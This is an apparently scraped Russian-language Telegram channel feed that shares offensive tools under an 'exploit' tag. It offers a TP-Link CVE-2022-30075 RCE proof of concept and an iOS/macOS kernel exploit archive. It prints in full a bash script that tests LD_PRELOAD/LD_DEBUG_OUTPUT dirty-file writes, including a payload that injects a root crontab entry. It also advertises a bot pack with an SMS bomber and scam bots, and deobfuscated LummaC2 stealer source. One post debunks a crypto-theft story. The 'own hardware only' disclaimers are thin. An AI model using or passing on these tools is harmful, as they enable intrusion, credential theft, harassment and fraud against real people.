tplink.py
11.7 KB
💥CVE-2022-30075 PoC exploit(Authenticated RCE in Tp-Link Routers)
⚠️Affected Devices:
Tp-Link routers with backup and restore functionality and firmware is older than june 2022
usage:
tplink.py [-h] -t target -p password [-b] [-r backup_directory] [-c cmd]
только для тестирования на своём оборудовании ⚠️
#эксплойт
⚠️Affected Devices:
Tp-Link routers with backup and restore functionality and firmware is older than june 2022
usage:
tplink.py [-h] -t target -p password [-b] [-r backup_directory] [-c cmd]
только для тестирования на своём оборудовании ⚠️
#эксплойт
👍3❤1👎1💅1
Эксплуатация Synology NAS с использованием разделителей и новых приёмов:
перечисление переменных окружения Linux и методы записи — v1.0
только для тестирования на своём оборудовании ⚠️
#эксплойт
перечисление переменных окружения Linux и методы записи — v1.0
#!/usr/bin/env bash
test_cmd="id"
cron_paths=(
"/etc/crontab"
"/usr/lib/crontab"
"/usr/lib/cron/tabs/root"
"/var/cron/tabs/root"
"/var/spool/cron/root"
"/var/spool/cron/crontabs/root"
"/var/cron/tabs/root"
"/var/spool/cron/tabs/root"
"/etc/cron.d/"
"/etc/cron.daily/"
"/etc/cron.hourly/"
"/etc/cron.weekly/"
"/etc/cron.monthly/"
"/etc/cron.15min/"
"/etc/cron.30min/"
"/usr/local/etc/cron.d/"
"/etc/fcrontab"
"/var/spool/fcron/root"
"/etc/fcron.allow"
"/etc/fcron.deny"
"/etc/anacrontab"
"/etc/bcron/tabs/root"
"/etc/bcron/run"
"/etc/crontabs/root"
"/usr/lib/cron/tabs/root"
"/var/cron/tabs/root"
"/etc/daily"
"/etc/weekly"
"/etc/monthly"
)
search_for_cron_paths() {
local found=0
for path in "${cron_paths[@]}"; do
if [[ -e "$path" ]]; then
echo "[+] Location found: $path"
found=1
fi
done
if [[ $found -eq 0 ]]; then
echo "No well-known cron target locations found! Linker dirty file write may not be viable"
fi
}
test_write_technique() {
local write_var="$1"
local write_path="/var/tmp/WRITE-$RANDOM$RANDOM"
local additional_environ="${2:-}"
env -i "$write_var=$write_path" "$additional_environ" "$test_cmd" >/dev/null 2>&1
ls_out=$(ls $write_path* 2>/dev/null)
if [[ ! -z $ls_out ]]; then
echo "[+] Success! Wrote to file $ls_out using payload $write_var=$write_path" "$additional_environ"
rm $write_path*
else
echo "[-] Technique $write_var failed"
fi
}
echo '[*] Attempting to locate potential crontab locations for dirty file write'
search_for_cron_paths
echo '[*] Attempting to write to semi-controlled file path with semi-controlled contents...'
test_write_technique "LD_DEBUG_OUTPUT" $'LD_DEBUG=libs LD_PRELOAD=$(printf \'ESCAPE\\n*\\t*\\t*\\t*\\t*\\troot\\twhoami\\nESCAPE\')'
echo '[*] Attempting to write to fully controlled file path with uncontrolled contents...'
echo '[*] (This useful for targeting automated directory crawlers that are vulnerable to file name-based injections, like CVE-2024-3400)'
test_write_technique "PCPROFILE_OUTPUT" "LD_PRELOAD=libpcprofile.so"
test_write_technique "MEMUSAGE_OUTPUT" "LD_PRELOAD=libmemusage.so"
только для тестирования на своём оборудовании ⚠️
#эксплойт
👍3😐1🆒1
exploit for iOS 15_macOS 12.zip
5.5 MB
Эксплуатация уязвимостей чтения/записи в ядре для iOS 15 и macOS 12
Затронутые уязвимости:
Уязвимые устройства:
только для тестирования на своём оборудовании ⚠️
#эксплойт
Затронутые уязвимости:
- CVE-2022-32845 — обход проверки цифровой подписи для файлаmodel.hwx.
- CVE-2022-32948 — чтение за пределами буфера (OOB Read) в функцииDeCxt::FileIndexToWeight()из-за отсутствия проверки индекса массива.
- CVE-2022-42805 — потенциальное произвольное чтение памяти в функцииZinComputeProgramUpdateMutables()вследствие целочисленного переполнения.
- CVE-2022-32899 — переполнение буфера вниз (buffer underflow) в функцииDeCxt::RasterizeScaleBiasData()из-за целочисленного переполнения.
Уязвимые устройства:
- iPhone 12 Pro (iPhone13,3) под управлением iOS 15.5
- iPad Pro (iPad8,10) под управлением iPadOS 15.5
- iPhone 11 Pro (iPhone12,3) под управлением iOS 15.4.1
- MacBook Air (MacBookAir10,1) на чипе Apple M1 с macOS 12.4
только для тестирования на своём оборудовании ⚠️
#эксплойт
👍3😁1
Пак ботов.zip
15.8 MB
15 приватных телеграмм ботов
Пак актуальных телеграм ботов. Можно использовать под различные цели. Инструкция по установке внутри.
📁 В паке имеется:
Пак актуальных телеграм ботов. Можно использовать под различные цели. Инструкция по установке внутри.
📁 В паке имеется:
- Фейк Глаз Боба
- Гарант бот от Scrooge
- 21 очко (казино)
- Казино за 1500
- Кубик (слив привата)
- Приватный cмc б0мбeр
- 0трисoвщик
- Гарант бот
- Бот автопродаж две версии
- Бот для заявок воркeров
👍4💅1
разоблачение скама на $27 миллионов
специально для @stars_away
1. браузеры физически не умеют сами запускать любые скачанные файлы (тем более исполняемые). чтобы код выполнился без единого клика, нужен редчайший rce-0day в chrome или safari, но такие эксплойты нулевого дня с автоматическим выполнением кода на актуальных версиях практически не существуют в открытом доступе (либо находятся в руках очень узкого круга лиц, либо доступны только государственным структурам).
2. на ios всё ещё сложнее: там физически невозможно запустить какое-либо приложение вне app store, система не выдаёт доступ к данным других приложений, всё критически важное лежит в secure enclave. вирусы через одну лишь ссылку в safari уже невозможны по архитектуре системы. чтобы реально взломать iphone через браузер, нужна цепочка уязвимостей уровня pegasus (которая опять же доступна только государствам).
единственный реалистичный вариант, человек САМ скачал и САМ запустил файл на компьютере. дальше стиллер спокойно вытащил сид-фразу или другие данные. никакого автоматического заражения iphone, никакого магического захвата мультисигов через ссылку не существует. это классическая попытка прикрыть собственную ошибку громкой историей и невозможной. либо человек просто выдумал всё это, не понимая технического аспекта (что более вероятно).
специально для @stars_away
🥰8😁1🤡1
LummaC2-Stealer-main.zip
28.1 KB
деобфусцированный код LummaC2, одного из самых популярных приватных стиллеров.
только для тестирования на своём оборудовании ⚠️
только для тестирования на своём оборудовании ⚠️
👍3🔥3💩1